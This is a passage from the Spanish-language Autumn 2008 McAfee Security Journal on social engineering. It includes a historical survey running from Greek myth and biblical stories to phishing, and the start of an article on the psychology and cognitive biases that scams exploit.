Perspectiva sobre seguridad de McAfee® Avert® Labs Otoño de 2008
Ingeniería social La principal amenaza de seguridad del mundo
Troyanos, falsos clic y anuncios de dinero fácil son algunos de los vectores utilizados por los creadores de malware para aprovecharse de los usuarios de Internet
McAfee Security Journal Otoño 2008
Índice
4
Los orígenes de la ingeniería social Desde el caballo de Troya de la Odisea hasta el phishing en Internet: el eterno engaño. Hiep Dang
9
Pedid y se os dará La psicología de la ingeniería social: ¿Por qué funciona? Karthik Raman
13
Ingeniería social 2.0: ¿Y ahora qué? El fraude del clic se vislumbra como una de las amenazas más importantes que deberemos afrontar en el futuro cercano. Markus Jakobsson
16
Los Juegos Olímpicos de Pekín: Un objetivo perfecto para el malware de ingeniería social Los Juegos Olímpicos, junto con otros grandes eventos, constituyen una atracción irresistible para los creadores de malware. Elodie Grandjean
22
Vulnerabilidades en los mercados de valores ¿Pueden los piratas informáticos obtener ganancias del Martes de parches y otras noticias de las empresas? Anthony Bettini
28
El futuro de los sitios de redes sociales La afluencia de usuarios y dinero convierte a los sitios sociales en un objetivo más del malware. Craig Schmugar
31
La nueva cara de las vulnerabilidades Trucos de ingeniería social pueden empujar a los usuarios a agujeros de software. Rahul Kashyap
34
Typosquatting: Aventuras involuntarias de navegantes El navegante imprudente puede acabar en el lugar equivocado. Benjamin Edelman
38
¿Qué ha sido del adware y el spyware? Una legislación más severa puede haber apaciguado el adware, pero los programas potencialmente no deseados (PUP) y troyanos siguen entre nosotros. Aditya Kapoor
44
Estadísticas ¿Cuál es el riesgo para los dominios de primer nivel? David Marcus
Redactor jefe Dan Sommer Colaboradores Anthony Bettini Hiep Dang Benjamin Edelman Elodie Grandjean Jeff Green Aditya Kapoor Rahul Kashyap Markus Jacobsson Karthik Raman Craig Schmugar Estadísticas Toralv Dirro Shane Keats David Marcus François Paget Craig Schmugar Ilustrador Doug Ross Diseño PAIR Design, LLC Agradecimientos Muchas personas han contribuido a la creación de este número de McAfee Security Journal. Citaremos únicamente algunos de los colaboradores más destacados: los directivos de McAfee, Inc. y McAfee Avert Labs que han prestado su apoyo a esta creación; nuestro equipo de revisores—Carl Banzhof, Hiep Dang, David Marcus, Craig Schmugar, Anna Stepanov y Joe Telafici; nuestros autores y sus jefes y compañeros que les han aportado sus ideas y comentarios; los especialistas en marketing Cari Jaquet, Mary Karlton, Beth Martinez y Jennifer Natwick; el especialista en relaciones públicas Joris Evers, su equipo internacional y Red Consultancy Ltd.; nuestra agencia de diseño, Pair Design; nuestra imprenta, RR Donnelley, y Derrick Healy y su equipo en nuestra oficina de localización de Cork, Irlanda, que ha coordinado la traducción de esta publicación a muchos idiomas. ¡Gracias a todos; esta publicación no sería una realidad sin vuestra inestimable contribución! Dan Sommer Redactor jefe
¿Le ha gustado? ¿No le ha gustado? Envíe sus comentarios a
[email protected].
El debut de "McAfee Security Journal" Jeff Green
Bienvenido al primer número de nuestra revista de seguridad McAfee Security Journal. Aunque lo llamamos "primer número", en realidad no es la primera vez que realizamos esta publicación. Le hemos cambiado el nombre; hasta ahora era Análisis de amenazas globales (GTR). En McAfee Security Journal, observará la actitud crítica de siempre, junto a todo el contenido dinámico que puede esperar de los mejores investigadores y autores en el campo de la investigación de la seguridad informática: los especialistas de McAfee® Avert® Labs. En este número, abordamos el vector de ataque más insidioso e invasivo de todos: la ingeniería social. ¡Tibet libre! ¡Nuevas imágenes de la III Guerra Mundial! ¡Secretos para evadir impuestos! ¡Nuevas tecnologías para ahorrar electricidad! ¡Medicinas a buen precio a través de Internet! Y la lista podría seguir, pero creo que ha quedado claro. Ahora más que nunca el envío de mensajes seductores que lleguen a las víctimas potenciales es clave para el éxito de los desarrolladores de malware y los ladrones de identidad. Sin embargo, el uso de la ingeniería social como método de estafa no es precisamente nuevo: existe desde que los humanos se comunican. Tú tienes algo que yo quiero. Te convenzo para que me lo des o para que hagas lo que yo quiero. El factor humano hace de la ingeniería social una de las amenazas más difíciles de combatir. Es posible que la forma más fácil de apoderarse de la identidad de otra persona sea simplemente pedírsela. Todas las técnicas de ingeniería social —estafas Ponzi, timos, estafas piramidales, fraudes sencillos, phishing o spam —siguen patrones similares. Ya sean físicas o digitales, todas tienen elementos en común. Comparten el mismo objetivo y en muchos casos incluso emplean las mismas técnicas. Todas pretenden manipular a las víctimas aprovechando un “fallo” en el hardware humano. Todas crean escenarios especialmente diseñados para convencer a las víctimas de que divulguen determinada información o realicen una acción concreta. Hemos reunido a otro destacable grupo de investigadores y autores para analizar este tema y documentarlo para nuestros lectores. Incluso hemos incorporado una novedad a nuestra revista: será la primera vez que contamos con colaboradores invitados. Empezamos con dos de los mejores: el Dr. Markus Jacobsson del centro de investigación Palo Alto Research Center y el profesor Benjamin Edelman de la universidad de estudios empresariales Harvard Business School.
Empezaremos con una mirada retrospectiva a la historia del engaño. A continuación, analizaremos el trasfondo psicológico de este tipo de ataques. Después examinaremos la posible evolución de la ingeniería social en los próximos años. Los Juegos Olímpicos de Pekín de 2008 han terminado, y una vez más los autores de malware han intentado engañar a los aficionados para que visitaran sitios Web falsos. ¿Se puede ganar dinero en la bolsa programando eventos como los Martes de parches de Microsoft o falsificando noticias de empresas? En nuestra exhaustiva investigación hallarán una respuesta. ¿Y qué ocurrirá a partir de ahora con los sitios de redes sociales? ¿Se reforzará la seguridad o están condenados a convertirse en objetivos fáciles debido a un exceso de confianza de los usuarios? Vamos a ver también cómo atacan los creadores de malware algunas vulnerabilidades del software y cómo aprovechan los errores cometidos al escribir el nombre de los sitios Web, técnica conocida como typosquatting. Nuestro artículo final dará una respuesta a la pregunta “¿Qué ha pasado con el adware y el spyware?” Terminaremos con algunos datos estadísticos que muestran cómo varía el porcentaje de amenazas dirigidas a dominios de nivel superior en todo el mundo. Esperamos que encuentre este número tan interesante e inquietante como nosotros. Gracias por acompañarnos de nuevo en nuestro viaje a las profundidades de la seguridad informática.
Jeff Green es Vicepresidente primero de McAfee Avert Labs y del departamento de Desarrollo de productos. Es responsable a nivel mundial de toda la organización de investigación de McAfee, que se extiende por los continentes americano, europeo y asiático. Su tarea es supervisar los equipos de investigación que se ocupan de los virus, ataques dirigidos y ataques de piratas, spyware, spam, phishing, vulnerabilidades y parches, así como de las tecnologías de detección/prevención de intrusiones en hosts y redes. Además, Green lidera la investigación sobre seguridad a largo plazo con el fin de garantizar que McAfee vaya siempre un paso por delante de las amenazas emergentes.
OTOÑO 2008
3
Los orígenes de la ingeniería social Hiep Dang
Sería difícil hoy en día leer un artículo de prensa o un libro sobre seguridad informática sin que apareciera el término ingeniería social más de una vez. Popularizada por Kevin Mitnick (posiblemente el ingeniero social más tristemente famoso de la era informática moderna), la ingeniería social es en esencia el arte de la persuasión: convencer a las personas para que revelen datos confidenciales o realicen alguna acción. Aunque el término ingeniería social es relativamente nuevo, las técnicas y filosofías que la sustentan están presentes desde los albores de la humanidad. Existen historias de engaño y manipulación en muchas páginas de la historia, el folclore, la mitología, la religión y la literatura.
más de ingeniería social contra Zeus, Prometeo robó “el brillo que se ve de lejos del infatigable fuego en una hueca cañaheja” del monte Olimpos y se lo legó a los hombres. Como castigo por sus actos, Prometeo fue encadenado a una roca, a la que cada día llegaba un águila que le comía el hígado; por la noche éste le volvía a crecer. Como castigo para los hombres, Zeus creó a la primera mujer, Pandora, quien portaba un ánfora que ella abrió por curiosidad, liberando incontables plagas.
El ataque de phishing de Jacob y Rebeca Prometeo: ¿el Dios de la ingeniería social? Según la mitología griega, el nivel de competencia actual del ser humano en la ingeniería social es probablemente resultado directo de su mayor mentor: Prometeo, cuyas habilidades le llevaron a creer que podía engañar a Zeus, el mayor de los dioses. En la Teogonía y Trabajos y días, el poeta épico Hesíodo narra la historia de Prometeo, un Titán conocido por sus mañas y sus astutos ardides. Se le atribuye la creación del hombre, modelado a partir de barro. En lo que se conoce como el "Engaño de Mecona", Prometeo presentó a Zeus dos ofrendas para dirimir una disputa entre dioses y mortales. Una ofrenda era la carne de un buey metida en el interior de su estómago, la otra era el esqueleto del buey cubierto con brillante grasa. La una era alimento envuelto en cobertura vil mientras la otra era ofrenda incomestible, aunque muy tentadora a la vista. Zeus eligió la última y, como consecuencia, en lo sucesivo la humanidad debería sacrificar a los dioses sólo huesos y grasa, conservando la carne para sí. Enojado por el engaño de Prometeo, Zeus castigó a los mortales quitándoles el fuego. Sin embargo, en un acto
4
McAFEE SECURITY JOURNAL
Del Antiguo Testamento proviene la historia de Jacob y su madre Rebeca, quien utilizó una técnica de ingeniería social que es la base de los actuales ataques de phishing: hacer creer a la víctima que el atacante es alguien diferente. El padre de Jacob y esposo de Rebeca, Isaac, se quedó ciego en los últimos años de su vida. Mientras se preparaba para morir, ordenó a su hijo mayor, Esaú: “tráeme caza y prepárame un buen guisado como a mí me gusta y tráemelo para que yo coma y que mi alma te bendiga antes que yo muera.” (Génesis 27:2-4.) Como quería que fuera Jacob en lugar de Esaú el que recibiera las bendiciones de Isaac, Rebeca concibió un plan. Jacob, reacio al principio, dijo: "Esaú mi hermano es hombre velludo y yo soy lampiño. Quizá mi padre me toque, y entonces seré para él un engañador y traeré sobre mí una maldición y no una bendición.” (Génesis 27:11-12.) Para engañar a Isaac y hacerle creer que estaba con Esaú, Rebeca preparó la comida de Isaac, vistió a Jacob con las mejoras ropas de Esaú y le puso piel de cabrito en las partes lampiñas de las manos y el cuello. Jacob le entregó la comida a Isaac, superó la prueba de autenticación y consiguió las bendiciones que debían ser para Esaú.
Sansón y Dalila: espionaje a sueldo Sansón fue un personaje bíblico de enorme fuerza que peleó contra los filisteos. El secreto de su fuerza estaba en su largo cabello. Estando en Gaza, Sansón se enamoró de Dalila. Los filisteos la convencieron para que averiguara el secreto de la fuerza de Sansón a cambio de 1.100 monedas de plata. “Persuádelo, y ve dónde está su gran fuerza, y cómo podríamos dominarlo para atarlo y castigarlo. Entonces cada uno de nosotros te dará 1.100 monedas de plata.” (Jueces 16:5.) Sansón se resistió a desvelar su secreto antes de sucumbir a su capacidad de persuasión. Así que ella le dijo: “¿Cómo puedes decir: 'Te quiero,' cuando tu corazón no está conmigo?” “Me has engañado tres veces y no me has declarado dónde reside tu gran fuerza.” Finalmente, tras insistir y acosarlo día y noche, se rindió. De modo que le dijo: ”Nunca ha pasado navaja sobre mi cabeza, pues he sido Nazareo para Dios desde el vientre de mi madre. Si me cortan el cabello, mi fuerza me dejará y me debilitaré y seré como cualquier otro hombre.” (Jueces 16:15–17.) En cuanto Sansón se durmió, Dalila se aprovechó de su vulnerabilidad y le cortó el pelo. Debilitado como quedó, los filisteos prendieron a Sansón, le sacaron los ojos, lo encadenaron y encarcelaron para siempre.
El primer caballo de Troya La historia del caballo de Troya, famosa gracias a la obra épica del poeta griego Homero, la Odisea, y a la del poeta romano Virgilio, la Eneida, fue uno de los engaños de ingeniería social más inteligentes de la historia de la humanidad. Durante la guerra de Troya, los griegos no pudieron derribar las murallas que circundaban la ciudad. El astuto guerrero griego Ulises concibió una estratagema para inducir a los troyanos a creer que los griegos habían abandonado el asedio de la ciudad. Los griegos alejaron su flota de barcos y solo dejaron en la playa un gran caballo de madera junto con un soldado griego llamado Sinón. Tras ser capturado por los troyanos, Sinón les dijo que los griegos habían dejado el enorme caballo de madera como ofrenda a los dioses para garantizar su seguridad en el viaje de vuelta a casa y que lo habían hecho tan grande para que los troyanos no lo pudieran desplazar al interior de la ciudad, ya que ello les traería mala suerte a los griegos. El relato fue tan tentador que los troyanos introdujeron el caballo de madera tras las murallas de la ciudad, a pesar de los avisos de Casandra, que fue maldita con la habilidad de predecir el futuro sin que nadie la creyera jamás, y de Laocoonte, un sacerdote troyano, quien en la Eneida exclamó:
“¡Oh miserables ciudadanos! ¡Qué locura tan grande! ¿Qué increíble locura es ésta? ¿Pensáis que se han alejado los Griegos de vuestras costas? ¿Así conocemos a Ulises? O en esa armazón de madera, hay gente aqui va oculta, o se ha fabricado en daño de nuestros muros, con objeto de explorar nuestras moradas y dominar desde su altura la ciudad, o algún otro engaño esconde. ¡No confiéis en sus regalos, no creáis en el caballo!” La falta de juicio de los troyanos fue su perdición. Esa noche, dirigidos por Ulises, los soldados griegos ocultos en el interior del caballo mataron a los guardias y abrieron las puertas al resto del ejército. Gracias a la ingeniosa táctica de ingeniería social ideada por Ulises, los griegos derrotaron a los troyanos.
El caballo de Troya actual Cuando Ulises trazó su plan para infiltrarse en Troya, poco imaginaba él que estaba sentando un precedente para los siglos venideros. El tipo de malware más frecuente que se encuentra en la actualidad, el término "caballo de Troya" electrónico lo acuñó Daniel Edwards de la Agencia de Seguridad Nacional de Estados Unidos en los años setenta. Edwards le puso ese nombre por la técnica de ingeniería social utilizada por los griegos. Antes de Internet, los usuarios de PC que querían compartir archivos de software lo hacían mediante dispositivos físicos (como discos flexibles o unidades de cinta) o conectándose a los sistemas de tablón de anuncios (BBS). Los piratas informáticos con fines malintencionados se dieron cuenta enseguida de que podían inducir a los usuarios a ejecutar un código malintencionado sencillamente disfrazándolo como un juego o una utilidad. Debido a la simplicidad y efectividad de los troyanos, los creadores de malware todavía emplean esta técnica de ingeniería social siglos después. En la actualidad, el número de usuarios de PC que se dejan infectar con troyanos es alarmante. Les atrae la tentación de la música, los vídeos, el software gratuitos y los simpáticos mensajes electrónicos de anónimos “seres queridos”.
OTOÑO 2008
5
Crecimiento del malware y los programas PUP Distintas familias desde el año 1997 al 2007 en miles
140 130 120 110 Virus y bots
100
Troyanos
90
PUP
80 70 Figura 1: La frecuencia de malware y programas potencialmente no deseados (PUP) en los archivos de firmas de McAfee ha tenido varios momentos álgidos en la última década. En 1998 entraron en escena los generadores de virus; en 2003 y 2004 se popularizaron los remitentes de correo masivo; en 2004 y 2005 aumentaron las redes de bots y en 2006 y 2007 despegaron los troyanos.
60 50 40 30 20 10 0
1997
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
Un timo actualizado El fraude del pago por adelantado, más conocido como timo nigeriano (timo 419), ha circulado durante décadas y sigue siendo uno de los tipos de spam más prolíficos. El número “419” hace referencia a la sección del Código Penal de Nigeria que prohíbe esta práctica. Esta táctica de ingeniería social de “enriquecimiento rápido” llegó en forma de carta y empezó a distribuirse por correo postal en los setenta. El timo evolucionó hacia faxes no solicitados en los ochenta y, en la actualidad, se envía casi exclusivamente a través del correo electrónico. Sus orígenes se remontan al siglo dieciséis, cuando se conocía como el timo del prisionero español. El plan es bien sencillo: se informa a una víctima ingenua sobre un prisionero español enormemente rico que necesita ayuda para ser liberado. Este por así llamarlo
6
McAFEE SECURITY JOURNAL
prisionero contaba con que el estafador recaudaría la cantidad necesaria para el rescate. El estafador abordaba a la víctima contándole la historia y “permitía” que él o ella le ayudaran con una parte de la recaudación de fondos, bajo la promesa de enormes ganancias. Hoy conocemos numerosas variantes de la carta, pero el concepto es el mismo. El timo nigeriano atrae a sus víctimas con la tentadora promesa de un pago multimillonario a cambio de una “inversión” de sólo unos pocos miles de dólares. Aunque la mayoría de los receptores comprenden que la oferta es demasiado buena para ser cierta, aproximadamente un 1% de los destinatarios acaba respondiendo. Según los servicios secretos de EE. UU., los timadores estafaron a sus víctimas una media de 100 millones de dólares anuales.
Informes sobre casos de phishing En miles
60 Informes de nuevos casos de phishing
50
Nuevos sitios de phishing
40 30
Figura 2: Los informes sobre phishing muestran un crecimiento sostenido y el número de nuevos sitios de phishing se ha incrementado espectacularmente en los dos últimos años. (Fuente: AntiPhishing Working Group)
20 10 0 Nov de 2003
Mayo de 2004
Nov de 2004
Mayo de 2005
Nov de 2005
Mayo de 2006
Nov de 2006
Mayo de 2007
Nov de 2007
Phishing El término phishing fue acuñado por los piratas informáticos. Proviene de fishing (pesca) porque esta técnica de ingeniería social engaña a sus víctimas para que desvelen sus nombres de usuario, contraseñas, números de tarjeta de crédito y otros datos personales. En los años noventa, muchos piratas informáticos se aprovecharon de las ofertas de prueba gratuita del servicio de Internet de America Online (AOL) utilizando números falsos de tarjetas de crédito generados automáticamente, que no se correspondían con cuentas reales. Después de que AOL mejorase su seguridad y las pruebas de validación de tarjetas de crédito para garantizar que los números de dichas tarjetas fueran legítimos, los malhechores se lanzaron a la búsqueda de nombres
de usuario y contraseñas reales para introducirse en las redes de AOL. Empezaron enviando correos electrónicos y mensajes instantáneos falsos que parecían proceder del servicio técnico de AOL. Muchas víctimas desprevenidas facilitaron sus datos y a continuación se les facturaron actividades y compras que los piratas informáticos realizaron en sus cuentas. Los cibercriminales enseguida se dieron cuenta del margen potencial de beneficios y la tasa de éxito de tales ataques y dirigieron sus miradas a las empresas (bancos, eBay, Amazon y otras) que realizaban transacciones comerciales electrónicas.
OTOÑO 2008
7
Historia de la seguridad informática McAfee Avert Labs se convierte en el primer equipo de respuesta de emergencia antivirus internacional de la industria.
Comienzan a aparecer caballos de Troya en sistemas BBS. Se crea ARPANET (precursor de Internet).
Se crea INTERNET a partir de ARPANET.
Se publica en ARPANET Creeper (el primer virus informático). John von Neumann publica su teoría del autómata autorreproductor.
1948
Se concibe el primer ataque de phishing para robar contraseñas de usuarios de AOL.
Hace aparición el spam (correo electrónico no solicitado), poco después de que el público tuviera acceso a Internet. Dr. El Dr. Frederick Cohen publica “Virus Informáticos: teoría y experimentos” y reconoce a Leonard Adleman acuñando el término virus informático.
1965
1969
1971
1978 1980 1982 1983 1984 1986 1988
Se crea el primer sistema de tablón de anuncios (BBS) público. John Draper (alias Cap’n Crunch) descubre que un silbato de juguete que venía en una caja de cereales permite utilizar la red telefónica de forma ilegal.
2000 2002
2008
Aparece el gusano Morris (el primer virus que se autorreplica).
Aparece Elk Cloner (el primer virus para Apple). Se crea el correo electrónico.
1995 1996
En la actualidad, McAfee Avert Labs protege a sus clientes contra virus, gusanos, troyanos, spyware, programas PUP; vulnerabilidades, spam, phishing, dominios malignos, intrusiones de red e intrusiones en host.
Aparece Brain (el primer virus para PC). La película “Juegos de guerra” dramatiza sobre las consecuencias de la piratería.
Kevin Mitnick publica “The Art of Deception” (El arte del engaño), en el que describe su dominio de la ingeniería social. Spyware y adware se convierten en términos de uso común.
Figura 3: Cronología de los principales eventos de ingeniería social.
La historia se repite Hiep Dang es director del departamento de McAfee Avert Labs encargado de la investigación de las aplicaciones de malware. Es el responsable de la coordinación del equipo mundial de investigadores de malware de McAfee dedicado a la investigación, análisis y respuesta a los brotes de malware, incluyendo virus, gusanos, troyanos, bots y spyware. Dang escribe regularmente en los blogs y libros blancos de Avert Labs y en la publicación McAfee Security Journal. Ha sido entrevistado por el Wall Street Journal, MSNBC, PC Magazine y otras muchas publicaciones y medios sobre las nuevas amenazas y las tendencias del malware. Además, Dang práctica con entusiasmo el Kung Fu de la Mantis Religiosa del Norte Wah Lum Tam Tui y el Tai Chi. En la actualidad se encuentra en un paréntesis de su vida como formador concentrándose en la industria de la seguridad informática.
Ya se llame ingeniería social, artimañas, estafas, sesgos cognitivos o timos, el concepto de aprovecharse de la ingenuidad y la confianza de una persona es tan frecuente en la actualidad como lo ha sido desde los albores del tiempo. Si se pregunta a expertos en seguridad, convendrán que las personas somos el eslabón más débil de la cadena de seguridad. Podemos desarrollar el software más seguro que exista para proteger nuestros equipos, implantar las directivas de seguridad más restrictivas e intentar lograr la utópica educación del usuario. Sin embargo, mientras sigamos dejándonos arrastrar por la curiosidad y la codicia sin preocuparnos de las consecuencias, correremos el riesgo de sufrir nuestra propia versión de una tragedia troyana. El progreso no consiste en cambio, sino que depende de la capacidad de retentiva. Cuando el cambio es absoluto, no quedan restos que mejorar ni dirección que definir para la posible mejora: y cuando la experiencia no se retiene, como ocurre entre salvajes, la infancia es perpetua. Aquellos que no recuerdan el pasado, están condenados a repetirlo.—George Santayana, en “La razón en el sentido común”, de “La vida de la razón o fases del progreso humano”. Bibliografía • Anderson, J. P. (1972). Computer Security Technology Planning Study vol. II. (Estudio
sobre planificación de tecnología para la seguridad informática) U.S. Air Force. • Farquhar, M. (2005). A Treasury of Deception. (Un tesoro de mentira) New York: The Penguin Group. • Hesíodo (1914) Teogonía. (Traducción de A. Pérez Jiménez) • Hesíodo (1914) Trabajos y días. (Traducción de A. Pérez Jiménez) • Homero. La Ilíada. (Traducción de E. Crespo)
8
McAFEE SECURITY JOURNAL
• Mitnick, K. (2002). The Art of Deception. (El arte del engaño) Indianapolis, Indiana:
Wiley Publishing. • Myers, M. J. (2007). Phishing and Countermeasures. (El phishing y las medidas
para combatirlo) John Wiley & Sons, Inc. • Santayana, G. (1905). La vida de la razón o fases del progreso humano, Editorial Tecnos • Virgilio (1993). La Eneida. (Traducción de J. de Echave Sustaeta)
Pedid y se os dará Karthik Raman
En enero de 2007, un grupo de ciberdelincuentes recurrió a tácticas de ingeniería social para cometer el fraude online más importante del mundo del que se tienen datos: el robo de 877.000 euros de clientes del banco sueco Nordea Bank. Los clientes recibieron un correo electrónico supuestamente procedente del Nordea Bank, y 250 descargaron e instalaron el software “antispam” tal como se les pedía en el mensaje. En realidad, el software antispam era un troyano que recababa información de los clientes y que los delincuentes utilizaban para conectarse al sitio Web del banco y robar dinero1. Según un principio de seguridad universal, las personas son el punto débil de todo sistema de seguridad. Si bien los ataques contra la seguridad y las medidas de protección desarrolladas para responder a dichos ataques siguen evolucionando, la naturaleza humana permanece inalterable. Para un agresor informático, la ingeniería social es más eficaz y ofrece resultados más rápidos que efectuar un ataque de fuerza bruta en algoritmos de cifrado, realizar pruebas con datos aleatorios para detectar nuevas vulnerabilidades de software o aumentar la complejidad del malware. Para los autores del fraude del Nordea Bank era más sencillo pedir a los clientes del banco que instalaran un troyano que entrar en una cámara acorazada para robar dinero. Somos crédulos, codiciosos y curiosos, lo que significa que los ingenieros sociales pueden manipular nuestros sentimientos y pensamientos. Nos piden algo y muy a menudo se lo damos. Pero, ¿por qué nos comportamos de este modo? En un estudio pionero sobre la psicología de la seguridad, el prestigioso experto en seguridad Bruce Schneier identificó cuatro áreas de investigación—economía del comportamiento, psicología de la toma de decisiones, psicología del riesgo y neurociencia—que pueden ayudar a explicar por qué nuestra sensación de seguridad difiere de la realidad2. Esta edición de McAfee Security Journal y este artículo en concreto se centran en un aspecto de la seguridad: la ingeniería social. En este análisis, recurriremos a la neurociencia, la psicología de la toma de decisiones y la psicología social básica para analizar por qué nos dejamos embaucar por la ingeniería social sin percatarnos del engaño.
Dos cerebros El cerebro humano es posiblemente el sistema más complejo del universo. Parte de su complejidad radica en su complicada estructura e intrincada interacción de subsistemas. En el cerebro, las emociones parecen emerger de las partes internas más antiguas, como la amígdala, y el razonamiento de las partes externas más recientes, como el neocórtex3. Pero los centros de la emoción y la razón no son mutuamente excluyentes, como observó Isaac Asimov en su libro El cerebro humano4: Según parece, las emociones no surgen de una pequeña parte del cerebro en particular, sino que muchas partes, incluidos los lóbulos frontal y temporal del córtex, participan en una interacción compleja. Las partes del cerebro responsables de la emoción y la razón a veces pueden actuar en convergencia o en divergencia. Ese es el motivo por el que nos resulta difícil mantener separadas razón y emoción, y por el que le resulta fácil a la emoción imponerse a la razón cuando ambas se contradicen. Examinemos cómo nos enfrentamos al miedo, por ejemplo. Al analizar cómo reaccionamos ante un peligro inminente, el escritor científico Steven Johnson señala que la respuesta al miedo es “una combinación orquestal de instrumentos psicológicos que se suceden con una velocidad y precisión magistrales”5: Es lo que en lenguaje llano denominamos respuesta de lucha o huida. Sentir como se activa es uno de los mejores modos de percibir el cerebro y el cuerpo como un sistema autónomo que funciona independientemente de la voluntad consciente. Cuando volvemos a experimentar las condiciones que desencadenaron una respuesta de lucha o huida en el pasado, nos rendimos a la respuesta emocional aunque podamos pensar de forma objetiva que la respuesta no está fundamentada.
OTOÑO 2008
9
Políticos deshonestos, espías y estafadores saben que apelar a las emociones —especialmente al miedo— para provocar una respuesta emocional es un medio extremadamente eficaz para lograr sus fines. Los ingenieros sociales mantienen viva esta tradición.
Políticos deshonestos, espías y estafadores saben que apelar a las emociones —especialmente al miedo— para provocar una respuesta emocional es un medio extremadamente eficaz para lograr sus fines. Los ingenieros sociales mantienen viva esta tradición.
Teorías de la ingeniería social Manipulación de las emociones Muchos ingenieros sociales se centran en las emociones de miedo, curiosidad, codicia y compasión. Es un hecho arraigado que estas emociones son universales; en algún momento, todos sentimos miedo o curiosidad o nos dejamos llevar por la codicia o la compasión. El miedo y la curiosidad son útiles en muchas situaciones. Escapar de un edificio en llamas es algo positivo. La curiosidad puede ayudar a motivarnos y aprender algo nuevo. Aún así, actuar movidos por el miedo o la curiosidad puede empujarnos a hacer cosas peligrosas o no deseadas6. Algunos ataques pueden perpetrarse incluso sin que el ingeniero social esté presente, manipulando la curiosidad de una víctima. En abril de 2007, se dejaron en un aparcamiento de Londres varias unidades USB infectadas con un troyano bancario. Los que no pudieron resistir la tentación de saber qué contenían esas unidades, probablemente contentos por hacerse con un dispositivo de almacenamiento gratis, conectaron las unidades a sus equipos y los infectaron de malware7. Los delincuentes que amenazan o chantajean a sus víctimas manipulan su miedo. El troyano GPCoder.i, que hizo su aparición en junio de 2008, es un ejemplo de malware que manipulaba el miedo: cifraba los archivos de los usuarios y exigía un rescate a cambio de descifrarlos8. De igual forma, los delincuentes que sobornan a sus víctimas manipulan su codicia y los que fingen necesitar ayuda, su compasión.
clasificar las cosas en función de algunas características clave y luego responder de forma mecánica cuando alguna de estas características de activación se manifiesta. Analicemos cómo los ingenieros sociales pueden provocar en nosotros respuestas automáticas que les beneficien.
Activación de sesgos cognitivos Un sesgo cognitivo es un error mental causado por una estrategia de procesamiento de la información simplificada10. Cuando una heurística falla, se convierte en un sesgo. Los ingenieros sociales transforman nuestra heurística en errores “graves y sistemáticos”11. A continuación se describen algunos sesgos cognitivos que pueden explicar la ingeniería social: •
Sesgo de la elección comprensiva Recordamos una elección que hemos hecho en el pasado con más aspectos positivos que negativos12. Un internauta podría habituarse a comprar artículos con descuento en Internet a partir de recomendaciones de amigos. Un simple mensaje de spam podría parecer una recomendación más y llevar al comprador a proporcionar los datos de su tarjeta de crédito a un sitio Web fraudulento.
•
Sesgo de confirmación Recabamos e interpretamos la información de modo que confirme nuestros puntos de vista13. Veamos un ejemplo hipotético. Supongamos que Acme Corporation firma un contrato con Best Printers para el mantenimiento de sus impresoras y que el personal de servicio de Best Printers viste camisa gris de manga larga con placa de identificación. Con el tiempo, los empleados de Acme se acostumbrarán a ver al personal de servicio de Best Printers con sus uniformes e identificarán a cualquier persona con una camisa gris de manga larga y una placa de identificación como un técnico. Un ingeniero social podría confeccionar o robar un uniforme de Best Printers para hacerse pasar por personal de servicio, y no ser conminado a identificarse debido al sesgo de confirmación de los empleados de Acme.
•
Efecto de exposición Nos gustan las cosas (y otras personas) según lo familiarizados que estemos con ellas14. Las noticias sobre desastres naturales y provocados por el hombre a menudo dan pie a sitios Web de phishing que se aprovechan
Atajos mentales erróneos En ocasiones, los ingenieros sociales apelan a un elemento externo a nuestras emociones. Intentan alterar nuestras reglas mentales de procesamiento de la información, conocidas como heurística o reglas generales. Si bien hay que admitir que nuestra heurística es falible, también hay que decir que no podemos funcionar sin ella. Nuestras vidas serían demasiado complicadas si tuviéramos que analizar detenidamente todo lo que percibimos, decimos o hacemos. Necesitamos desesperadamente nuestros atajos mentales. El psicólogo Robert Cialdini explica esta necesidad9: No se puede pretender que reconozcamos y analicemos todos los aspectos de cada persona, circunstancia y situación con las que nos encontramos incluso en un solo día. No disponemos de tiempo, energía ni capacidad para ello. Debemos recurrir muy a menudo a nuestros estereotipos, nuestras reglas generales, para
10
McAFEE SECURITY JOURNAL
de ese sentimiento15. Las personas expuestas a estas noticias podrían ser fácilmente manipuladas para que visiten sitios Web de phishing que afirman guardar algún tipo de relación con estas noticias. Por último, su exposición a las noticias podría hacerles bajar la guardia en relación con la naturaleza maliciosa del sitio Web que están visitando. •
los medios de tergiversar el efecto de saliencia en su favor. Se pueden hacer pasar por un cliente trajeado o por un guardia uniformado, pero nunca por un malabarista con zancos. La confusión no se limita exclusivamente a la vestimenta y al aspecto: también puede implicar conocer la jerga, anécdotas o empleados de una empresa, e incluso imitar acentos regionales. Un ingeniero social de Madrid que pretenda infiltrarse en una empresa de Sevilla, puede saber que “Ana” ha vuelto a ser madre o que “Julio” va a dejar la empresa para irse a la competencia, e intercambiar unas palabras al respecto con la recepcionista utilizando acento de Sevilla con tal de conseguir acceso a las instalaciones como “técnico de mantenimiento”.
Anclaje Las personas nos centramos en un rasgo de identificación inicialmente manifiesto cuando tomamos decisiones sobre algo16. Un sitio Web falso de un banco que muestre ostensiblemente el logotipo específico de la entidad puede engañar a los usuarios, aunque haya otros indicadores de seguridad que les alerten del engaño17. •
Provocación de errores en esquemas Los psicólogos sociales definen un “esquema” como la imagen de la realidad que utilizamos como referencia para poder extraer conclusiones sobre nuestro entorno. De niños, aprendemos que tratar bien a los demás es algo bueno. El reputado ingeniero social Kevin Mitnick señala que los agresores lo saben y elaboran una petición para sus víctimas que “parezca tan razonable que no levante sospechas, al tiempo que se valen de su confianza”18. Por lo tanto, los ingenieros sociales se aprovechan del diseño de nuestro esquema social. A continuación se incluye una lista de valoraciones o errores sociales comunes, con ejemplos de cómo los ingenieros sociales se aprovechan de ellos: •
Error fundamental de atribución Las personas asumimos que los comportamientos de los demás reflejan sus características internas estables19. Éste es el error de las primeras impresiones equivocadas. Un ingeniero social se empleará con diligencia para crear una primera impresión favorable. Un agresor podría mostrarse amable a la hora de hacer una solicitud, o dominante a la hora de coaccionar a sus víctimas para que hagan algo. Las víctimas pueden no percatarse de que sus interlocutores son actores y de que su comportamiento es circunstancial, un medio para lograr un fin.
•
Efecto de saliencia Dado un grupo de personas, tendemos a creer que la persona con mayor o menor influencia es la que más sobresale20. Los ingenieros sociales son expertos en mezclarse y confundirse con su entorno, y tratan por todos
